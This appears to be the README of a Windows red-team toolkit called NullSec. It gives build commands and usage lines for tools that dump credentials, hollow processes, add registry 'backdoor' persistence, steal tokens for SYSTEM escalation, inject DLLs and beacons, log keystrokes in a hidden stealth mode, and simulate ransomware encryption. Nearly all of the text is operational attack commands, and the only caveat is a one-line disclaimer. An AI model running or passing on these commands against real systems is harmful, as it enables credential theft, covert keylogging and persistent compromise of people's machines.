Fast, native Windows security tools written in Go, Rust, and C
High-performance red team and penetration testing utilities for Windows systems
| Tool | Description |
|---|---|
creds_dump.go |
Extract credentials (Credential Manager, WiFi, browsers) |
hollow.go |
Process hollowing for code injection |
regpersist.go |
Registry-based persistence management |
token.go |
Token manipulation and privilege escalation |
| Tool | Description |
|---|---|
nullsec-crypt |
File encryptor/ransomware simulator for testing |
| Tool | Description |
|---|---|
dll_inject.c |
DLL injection via CreateRemoteThread |
keylogger.c |
Low-level keyboard hook keylogger |
cd go
GOOS=windows GOARCH=amd64 go build -o nullsec-creds.exe creds_dump.go
GOOS=windows GOARCH=amd64 go build -o nullsec-hollow.exe hollow.go
GOOS=windows GOARCH=amd64 go build -o nullsec-regpersist.exe regpersist.go
GOOS=windows GOARCH=amd64 go build -o nullsec-token.exe token.gocd rust
cargo build --release --target x86_64-pc-windows-msvc
# Or cross-compile:
cargo build --release --target x86_64-pc-windows-gnucd c
x86_64-w64-mingw32-gcc -o nullsec-inject.exe dll_inject.c
x86_64-w64-mingw32-gcc -o nullsec-keylog.exe keylogger.c -luser32nullsec-creds.exe -all # Dump all credentials
nullsec-creds.exe -wifi # WiFi passwords only
nullsec-creds.exe -browser # Browser credential pathsnullsec-token.exe -list # List processes with users
nullsec-token.exe -priv # Show current privileges
nullsec-token.exe -getsystem # Attempt SYSTEM escalation
nullsec-token.exe -steal 1234 # Steal token from PIDnullsec-regpersist.exe -list
nullsec-regpersist.exe -add backdoor -value "C:\payload.exe"
nullsec-regpersist.exe -remove backdoornullsec-inject.exe -l # List processes
nullsec-inject.exe -p 1234 -d payload.dll # Inject by PID
nullsec-inject.exe -n notepad.exe -d beacon.dllnullsec-hollow.exe -list # List target processes
nullsec-hollow.exe -target notepad.exe -file shellcode.binnullsec-keylog.exe # Log to console
nullsec-keylog.exe -o keylog.txt # Log to file
nullsec-keylog.exe -s # Stealth mode (hidden)These tools are for authorized security testing only. Unauthorized use is illegal.
NullSec Framework | GitHub | bad-antics | Discord